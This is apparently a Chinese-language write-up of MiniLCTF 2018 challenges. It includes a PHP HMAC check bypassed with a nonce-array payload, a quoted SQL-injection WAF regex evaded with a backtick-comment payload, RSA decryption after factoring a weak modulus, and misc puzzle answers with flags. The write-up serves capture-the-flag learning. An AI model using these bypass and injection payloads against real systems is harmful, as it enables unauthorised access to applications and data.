MiniLCTF 2018 WriteUp

Web

Web easy bypass

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
highlight_file(__FILE__);
if(empty($_POST['hmac']) || empty($_POST['host'])){
header('HTTP/1.0 400 Bad Request');
exit;
}
$secret = getenv("SECRET");
if(isset($_POST['nonce']))
$secret = hash_hmac('sha256',$_POST['nonce'],$secret);
$hmac = hash_hmac('sha256',$_POST['host'],$secret);
if($hmac !== $_POST['hmac']){
header('HTTP/1.0 403 Forbidden');
exit;
}
echo exec('cat ../flag.txt');
?>

不会做啊,Google,发现了这个,诶嘿嘿

https://www.securify.nl/blog/SFY20180101/spot-the-bug-challenge-2018-warm-up.html

翻译 https://cyto.top/2018/05/19/translate-spot-the-bug-challenge2018-warm-up-wp/

payload:

1
hmac=6d37c0c2dd3737654ac70c307c036d9308f2d7284bee4393b2c36746b8909a18&host=cyto&nonce[]=

getflag: MiniLCTF{3asy_hm4c_Byp4ss_for_U}

Web baby sqli(复现)

题目:

小明写的博客总是被人日,于是他一气之下写了一套超级牛逼的WAF,大黑阔们还能绕过吗?
hint:用户名为admin
hint1:
waf代码
if(preg_match(“/|#|;|,|is|file|drop|union|select|ascii|mid|from|(|)|or|\^|=|<|>|like|regexp|for|and|limit|file|–|||&|”.urldecode(‘%09’).”|”.urldecode(“%0b”).”|”.urldecode(‘%0c’).”|”.urldecode(‘%0d’).”|”.urldecode(‘%a0’).”/i”,$username)){
die(‘wafed by pupiles’);
}
$password的过滤同$username
数据库连接代码
mysql_query(“SELECT
FROM pupiles_admin where username = ‘“.$username.”‘ and passwd = ‘“.md5($passwd).”‘“);
hint2:
先想想怎么绕过注释符

大师傅的wp

用反引号```做注释,mysql会把反引号后面的东西当做是别名orz

所以payload: `username=admin’ group by @``

getflag: minil{Please_have_Fun!}

Crypto

Crypto Easy RSA

1
2
3
4
5
6
7
8
$ openssl rsa -in c1-public.pem -pubin -noout -text -modulus
Public-Key: (256 bit)
Modulus:
00:bf:e9:96:75:20:88:88:5f:2e:a2:35:2f:df:3e:
95:15:f6:62:fc:4d:34:75:dd:a6:f8:a1:60:8e:54:
b4:16:b7
Exponent: 65537 (0x10001)
Modulus=BFE996752088885F2EA2352FDF3E9515F662FC4D3475DDA6F8A1608E54B416B7
1
2
e 65537
n BFE996752088885F2EA2352FDF3E9515F662FC4D3475DDA6F8A1608E54B416B7
1
2
>>>print int('BFE996752088885F2EA2352FDF3E9515F662FC4D3475DDA6F8A1608E54B416B7',16)
86804467865189181998675682302645596768517985924006311724377177674474176386743

http://factordb.com/index.php?query=86804467865189181998675682302645596768517985924006311724377177674474176386743

1
2
p 293086410338424676391341741631987307899
q 296173636181072725338746212384476813557
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#!/usr/bin/env python2
# -*- coding:utf8 -*-
import gmpy
import rsa
def foo():
p=293086410338424676391341741631987307899
q=296173636181072725338746212384476813557
n=86804467865189181998675682302645596768517985924006311724377177674474176386743
e=65537
d=int(gmpy.invert(e,(p-1)*(q-1)))
private_key=rsa.PrivateKey(n,e,d,p,q)
with open('c1.txt','rb') as f:
print rsa.decrypt(f.read(),private_key).decode()
pass
if __name__ == '__main__':
foo()
print 'ok'

getflag:

1
minil{rsa_1s_c00l}

Misc

Misc1 Welcome

1
MiniLCTF{Welcome_to_MakerCTF233}

Misc2 Nazo

1

2

3

4

5

摩斯密码

key: sos

6

base64

key: 1029174037

7

macintosh

8

saionjisekai

9

图片拉长再旋转

pineapple

10

Google搜图

mouse

11

neweroslesstofu

12

一个人出数字,一方猜。出数字的人要先想好一个没有重复数字的4位数,例:8123,不能让猜的人知道。猜的人就可以开始猜。每猜一个数,出数者就要根据这个数字给出几A几B,例猜1562,则为 0A2B ,其中A前面的数字表示位置正确的数的个数,而B前的数字表示数字正确而位置不对的数的个数。

9506

13

新标签页打开,thealpha

14

下载图片,binwalk出torrent,下载

greendam

15

koenokiseki

16

保存,sublime打开

这些rect去掉

secretvg

17

全选,发现:

审查元素

18

key: th4nky0u

Misc 问卷调查

填问卷,getflag。

窝很可爱,请给窝钱